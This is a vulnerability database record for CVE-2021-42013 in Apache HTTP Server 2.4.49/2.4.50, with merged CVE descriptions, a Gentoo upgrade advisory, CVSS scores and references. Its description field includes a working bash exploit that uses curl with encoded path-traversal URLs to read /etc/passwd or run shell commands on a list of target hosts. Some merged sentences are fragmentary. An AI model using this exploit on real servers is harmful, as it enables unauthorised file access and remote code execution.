var-202110-1690
Vulnerability from variot
It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. This vulnerability information is reported directly to the product developer by the following person, and after coordination with the product developer, the purpose is to inform the product user. JVN It was announced at. Reporter : Internet Initiative Co., Ltd. Shugo Kumasaka Mr"" placed outside the document root by a remote third party. require all denied ” may allow unprotected files to be accessed. The server is fast, reliable and extensible through a simple API. A NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193) A NULL pointer dereference in httpd allows an unauthenticated remote malicious user to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798) An out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated malicious user to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160) An out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote malicious user to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275) A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated malicious user to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438) While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524) A path transversal flaw was found in Apache 2.4.49. Additionally this flaw could leak the source of interpreted files like CGI scripts. Additionally, this flaw could leak the source of interpreted files like CGI scripts. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013). # Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
Date: 10/05/2021
Exploit Author: Lucas Souza https://lsass.io
Vendor Homepage: https://apache.org/
Version: 2.4.50
Tested on: 2.4.50
CVE : CVE-2021-42013
Credits: Ash Daulton and the cPanel Security Team
!/bin/bash
if [[ $1 == '' ]]; [[ $2 == '' ]]; then echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] echo ./PoC.sh targets.txt /etc/passwd echo ./PoC.sh targets.txt /bin/sh id
exit fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done
PoC.sh targets.txt /etc/passwd
PoC.sh targets.txt /bin/sh whoami
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202208-20
https://security.gentoo.org/
Severity: High Title: Apache HTTPD: Multiple Vulnerabilities Date: August 14, 2022 Bugs: #813429, #816399, #816864, #829722, #835131, #850622 ID: 202208-20
Synopsis
Multiple vulnerabilities have been discovered in Apache Webserver, the worst of which could result in remote code execution.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-admin/apache-tools < 2.4.54 >= 2.4.54 2 www-servers/apache < 2.4.54 >= 2.4.54
Description
Multiple vulnerabilities have been discovered in Apache HTTPD. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All Apache HTTPD users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/apache-2.4.54"
All Apache HTTPD tools users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/apache-tools-2.4.54"
References
[ 1 ] CVE-2021-33193 https://nvd.nist.gov/vuln/detail/CVE-2021-33193 [ 2 ] CVE-2021-34798 https://nvd.nist.gov/vuln/detail/CVE-2021-34798 [ 3 ] CVE-2021-36160 https://nvd.nist.gov/vuln/detail/CVE-2021-36160 [ 4 ] CVE-2021-39275 https://nvd.nist.gov/vuln/detail/CVE-2021-39275 [ 5 ] CVE-2021-40438 https://nvd.nist.gov/vuln/detail/CVE-2021-40438 [ 6 ] CVE-2021-41524 https://nvd.nist.gov/vuln/detail/CVE-2021-41524 [ 7 ] CVE-2021-41773 https://nvd.nist.gov/vuln/detail/CVE-2021-41773 [ 8 ] CVE-2021-42013 https://nvd.nist.gov/vuln/detail/CVE-2021-42013 [ 9 ] CVE-2021-44224 https://nvd.nist.gov/vuln/detail/CVE-2021-44224 [ 10 ] CVE-2021-44790 https://nvd.nist.gov/vuln/detail/CVE-2021-44790 [ 11 ] CVE-2022-22719 https://nvd.nist.gov/vuln/detail/CVE-2022-22719 [ 12 ] CVE-2022-22720 https://nvd.nist.gov/vuln/detail/CVE-2022-22720 [ 13 ] CVE-2022-22721 https://nvd.nist.gov/vuln/detail/CVE-2022-22721 [ 14 ] CVE-2022-23943 https://nvd.nist.gov/vuln/detail/CVE-2022-23943 [ 15 ] CVE-2022-26377 https://nvd.nist.gov/vuln/detail/CVE-2022-26377 [ 16 ] CVE-2022-28614 https://nvd.nist.gov/vuln/detail/CVE-2022-28614 [ 17 ] CVE-2022-28615 https://nvd.nist.gov/vuln/detail/CVE-2022-28615 [ 18 ] CVE-2022-29404 https://nvd.nist.gov/vuln/detail/CVE-2022-29404 [ 19 ] CVE-2022-30522 https://nvd.nist.gov/vuln/detail/CVE-2022-30522 [ 20 ] CVE-2022-30556 https://nvd.nist.gov/vuln/detail/CVE-2022-30556 [ 21 ] CVE-2022-31813 https://nvd.nist.gov/vuln/detail/CVE-2022-31813
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202208-20
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-1690",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "http server",
"scope": "eq",
"trust": 1.6,
"vendor": "apache",
"version": "2.4.50"
},
{
"model": "http server",
"scope": "eq",
"trust": 1.6,
"vendor": "apache",
"version": "2.4.49"
},
{
"model": "instantis enterprisetrack",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.3"
},
{
"model": "secure backup",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1.0.1.0"
},
{
"model": "instantis enterprisetrack",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.1"
},
{
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.6.0"
},
{
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"model": "instantis enterprisetrack",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.2"
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"model": "\u65e5\u7acb\u9ad8\u4fe1\u983c\u30b5\u30fc\u30d0 rv3000",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"model": "http server",
"scope": null,
"trust": 0.8,
"vendor": "apache",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-03220"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-000090"
},
{
"db": "NVD",
"id": "CVE-2021-42013"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:apache:http_server:2.4.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.2.6.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "18.1.0.1.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-42013"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Valentin Lobstein",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-413"
}
],
"trust": 0.6
},
"cve": "CVE-2021-42013",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2021-000090",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2022-03220",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-42013",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "IPA",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-000090",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-42013",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "IPA",
"id": "JVNDB-2021-000090",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2022-03220",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-413",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2021-42013",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-03220"
},
{
"db": "VULMON",
"id": "CVE-2021-42013"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-000090"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-413"
},
{
"db": "NVD",
"id": "CVE-2021-42013"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. This vulnerability information is reported directly to the product developer by the following person, and after coordination with the product developer, the purpose is to inform the product user. JVN It was announced at. Reporter : Internet Initiative Co., Ltd. Shugo Kumasaka Mr\"\" placed outside the document root by a remote third party. require all denied \u201d may allow unprotected files to be accessed. The server is fast, reliable and extensible through a simple API. A NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193)\nA NULL pointer dereference in httpd allows an unauthenticated remote malicious user to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798)\nAn out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated malicious user to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160)\nAn out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote malicious user to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275)\nA Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated malicious user to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438)\nWhile fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)\nA path transversal flaw was found in Apache 2.4.49. Additionally this flaw could leak the source of interpreted files like CGI scripts. Additionally, this flaw could leak the source of interpreted files like CGI scripts. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013). # Exploit: Apache HTTP Server 2.4.50 - Path Traversal \u0026 Remote Code Execution (RCE)\n# Date: 10/05/2021\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage: https://apache.org/\n# Version: 2.4.50\n# Tested on: 2.4.50\n# CVE : CVE-2021-42013\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\nif [[ $1 == \u0027\u0027 ]]; [[ $2 == \u0027\u0027 ]]; then\necho Set [TAGET-LIST.TXT] [PATH] [COMMAND]\necho ./PoC.sh targets.txt /etc/passwd\necho ./PoC.sh targets.txt /bin/sh id\n\nexit\nfi\nfor host in $(cat $1); do\necho $host\ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done\n\n# PoC.sh targets.txt /etc/passwd\n# PoC.sh targets.txt /bin/sh whoami\n\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202208-20\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: Apache HTTPD: Multiple Vulnerabilities\n Date: August 14, 2022\n Bugs: #813429, #816399, #816864, #829722, #835131, #850622\n ID: 202208-20\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been discovered in Apache Webserver, the\nworst of which could result in remote code execution. \n\nAffected packages\n================\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 app-admin/apache-tools \u003c 2.4.54 \u003e= 2.4.54\n 2 www-servers/apache \u003c 2.4.54 \u003e= 2.4.54\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in Apache HTTPD. Please\nreview the CVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll Apache HTTPD users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-servers/apache-2.4.54\"\n\nAll Apache HTTPD tools users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-admin/apache-tools-2.4.54\"\n\nReferences\n=========\n[ 1 ] CVE-2021-33193\n https://nvd.nist.gov/vuln/detail/CVE-2021-33193\n[ 2 ] CVE-2021-34798\n https://nvd.nist.gov/vuln/detail/CVE-2021-34798\n[ 3 ] CVE-2021-36160\n https://nvd.nist.gov/vuln/detail/CVE-2021-36160\n[ 4 ] CVE-2021-39275\n https://nvd.nist.gov/vuln/detail/CVE-2021-39275\n[ 5 ] CVE-2021-40438\n https://nvd.nist.gov/vuln/detail/CVE-2021-40438\n[ 6 ] CVE-2021-41524\n https://nvd.nist.gov/vuln/detail/CVE-2021-41524\n[ 7 ] CVE-2021-41773\n https://nvd.nist.gov/vuln/detail/CVE-2021-41773\n[ 8 ] CVE-2021-42013\n https://nvd.nist.gov/vuln/detail/CVE-2021-42013\n[ 9 ] CVE-2021-44224\n https://nvd.nist.gov/vuln/detail/CVE-2021-44224\n[ 10 ] CVE-2021-44790\n https://nvd.nist.gov/vuln/detail/CVE-2021-44790\n[ 11 ] CVE-2022-22719\n https://nvd.nist.gov/vuln/detail/CVE-2022-22719\n[ 12 ] CVE-2022-22720\n https://nvd.nist.gov/vuln/detail/CVE-2022-22720\n[ 13 ] CVE-2022-22721\n https://nvd.nist.gov/vuln/detail/CVE-2022-22721\n[ 14 ] CVE-2022-23943\n https://nvd.nist.gov/vuln/detail/CVE-2022-23943\n[ 15 ] CVE-2022-26377\n https://nvd.nist.gov/vuln/detail/CVE-2022-26377\n[ 16 ] CVE-2022-28614\n https://nvd.nist.gov/vuln/detail/CVE-2022-28614\n[ 17 ] CVE-2022-28615\n https://nvd.nist.gov/vuln/detail/CVE-2022-28615\n[ 18 ] CVE-2022-29404\n https://nvd.nist.gov/vuln/detail/CVE-2022-29404\n[ 19 ] CVE-2022-30522\n https://nvd.nist.gov/vuln/detail/CVE-2022-30522\n[ 20 ] CVE-2022-30556\n https://nvd.nist.gov/vuln/detail/CVE-2022-30556\n[ 21 ] CVE-2022-31813\n https://nvd.nist.gov/vuln/detail/CVE-2022-31813\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202208-20\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-42013"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-000090"
},
{
"db": "CNVD",
"id": "CNVD-2022-03220"
},
{
"db": "VULMON",
"id": "CVE-2021-42013"
},
{
"db": "PACKETSTORM",
"id": "164501"
},
{
"db": "PACKETSTORM",
"id": "168072"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-42013",
"trust": 3.4
},
{
"db": "JVN",
"id": "JVN51106450",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "164501",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164941",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "164629",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "167397",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "164609",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/08/2",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/15/3",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/07/6",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/09/1",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/08/6",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/16/1",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/08/1",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/08/5",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/11/4",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/08/4",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/10/08/3",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "165089",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2021-000090",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "168072",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2022-03220",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "50512",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "50446",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "50406",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3348",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021101513",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042513",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021100718",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021100802",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2021100131",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2021110108",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202110-413",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-42013",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-03220"
},
{
"db": "VULMON",
"id": "CVE-2021-42013"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-000090"
},
{
"db": "PACKETSTORM",
"id": "165089"
},
{
"db": "PACKETSTORM",
"id": "164501"
},
{
"db": "PACKETSTORM",
"id": "168072"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-413"
},
{
"db": "NVD",
"id": "CVE-2021-42013"
}
]
},
"id": "VAR-202110-1690",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-03220"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-03220"
}
]
},
"last_update_date": "2024-01-17T19:11:09.746000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "hitachi-sec-2023-217",
"trust": 0.8,
"url": "https://downloads.apache.org/httpd/changes_2.4.51"
},
{
"title": "Patch for Apache HTTP Server Directory Traversal Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/313141"
},
{
"title": "Apache HTTP Server Repair measures for path traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=165084"
},
{
